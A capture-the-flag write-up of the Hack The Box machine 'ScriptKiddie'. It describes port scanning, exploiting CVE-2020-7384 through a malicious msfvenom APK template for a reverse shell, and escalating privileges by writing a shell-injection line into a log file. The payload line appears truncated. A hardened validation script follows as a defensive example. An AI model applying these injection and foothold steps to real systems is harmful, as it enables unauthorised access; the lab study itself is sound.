HTB - ScriptKiddie


We will start with NMAP -

nmap -sC -sV -p- -oN full_nmap_tcp -v -Pn <target-ip>

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
| 256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_ 256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)

5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5
|_http-title: k1d'5 h4ck3r t00l5



Since SSH is a hardened service with little attack surface, we will start with port 5000.

Port 5000

We see a Python web framework - Werkzeug/0.16.1 Python/3.8.5

Looking at the functionality, we can generate a shell, run an NMAP scan and look for exploits via Searchsploit. This looks like a "frontend" to the Metasploit framework.

We also see that the web page accepts a template file while generating payloads.

A quick Google search on MSFVenom and template brings us to CVE-2020-7384. Reference -

We can inject our own payload into the template, and when msfvenom generates its payload, ours is executed.


Initial Foothold

Exploiting CVE-2020-7384

We will download the exploit code and enter the attacker IP and port at the prompt -

Install jarsigner if it is not installed -

sudo apt-get install default-jdk

exploit.apk is generated and we start the netcat listener -

Upload the apk to the web app -

Once exploit.apk is uploaded, click Generate.

Reverse Shell -

Stabilize the shell by inserting our SSH public key into /home/kid/.ssh/authorized_keys

SSH to the target as user kid with the SSH key -

Privilege Escalation

Exploiting intended functionality -

We see another user, pwn, on the system, and we can access their home directory. Browsing to /home/pwn/ we see a script.

Looking at the script, we see it reads /home/kid/logs/hackers, which is owned by our current user kid -

Let's dissect the script line by line and see if we can get a shell as user pwn --

Looking at permissions, we can read/write /home/kid/logs/hackers. This is the part we control.

The core of the script is the nmap command, which is run through sh. So if we control the contents of the $log file, we can use shell metacharacters to append our own command.

Also, looking at the "cut" command in the script, it grabs the text from each log line after the second space (field 3 onwards).

So we can stuff our payload as follows (the second line is the script's own filter, the third is what it now yields) -

echo -n "blah blah ;/home/kid/logs/ #" > /home/kid/logs/hackers
cat $log | cut -d' ' -f3- | sort -u
;/home/kid/logs/ #

Finally, in the last line of the script there is an if condition: if the line count of the log is more than 0, the script itself overwrites the file with nothing.

To get around this, we use "echo -n" so that no newline (line break) is written and the line count stays at 0.
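The scan loop above passes log-derived text to sh, which is why a single line in the log can carry a command. As an added example (not the box's own script), a hardened rewrite in POSIX sh that accepts only a bare IPv4 address as the target, reports and drops anything else, and invokes nmap directly instead of through a shell string. The log format, the nmap flags and the NMAP_BIN variable are assumptions made for the demo.

```shell
# Constructed sample log: two leading fields (date, time), then the target,
# exactly the "after the second space" layout that cut -d' ' -f3- relies on.
SAMPLE_LOG=$(mktemp)
printf '%s\n' '2021-02-06 10:00:00 10.10.14.5' \
              '2021-02-06 10:00:01 10.10.14.6; echo injected #' > "$SAMPLE_LOG"

# Strict IPv4 check: four dotted decimal octets, each 0-255, nothing else.
# Any shell metacharacter, space or comment marker fails the first pattern.
is_ipv4() {
    ip=$1
    case $ip in
        ''|*[!0-9.]*|.*|*.|*..*|*[0-9][0-9][0-9][0-9]*) return 1 ;;
    esac
    set -- $(printf '%s' "$ip" | tr '.' ' ')   # split into octets
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Replacement for the cut|sort stage: same field selection, but every
# candidate is validated, and rejects are reported on stderr for detection.
extract_targets() {
    while IFS= read -r line; do
        ip=${line#* }; ip=${ip#* }           # drop the first two fields
        if is_ipv4 "$ip"; then
            printf '%s\n' "$ip"
        else
            printf 'rejected log line: %s\n' "$line" >&2
        fi
    done < "$1" | sort -u
}

# nmap gets one argv word per argument, never an "sh -c" string, so even a
# bad value could not be parsed as shell syntax. NMAP_BIN is an assumption
# so the example can be dry-run; unset it to call the real nmap.
scan_targets() {
    while IFS= read -r ip; do
        "${NMAP_BIN:-nmap}" --top-ports 10 -oN "recon/$ip.nmap" "$ip"
    done
}

NMAP_BIN=echo    # dry run for the demo
extract_targets "$SAMPLE_LOG" | scan_targets
```

Running it prints the one nmap command for 10.10.14.5 and a "rejected log line" message for the injected entry, which is the event a defender would alert on.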

We get shell as pwn -

Looking at the sudo -l output for pwn, we see they can run /opt/metasploit-framework-6.0.9/msfconsole via sudo without a password -
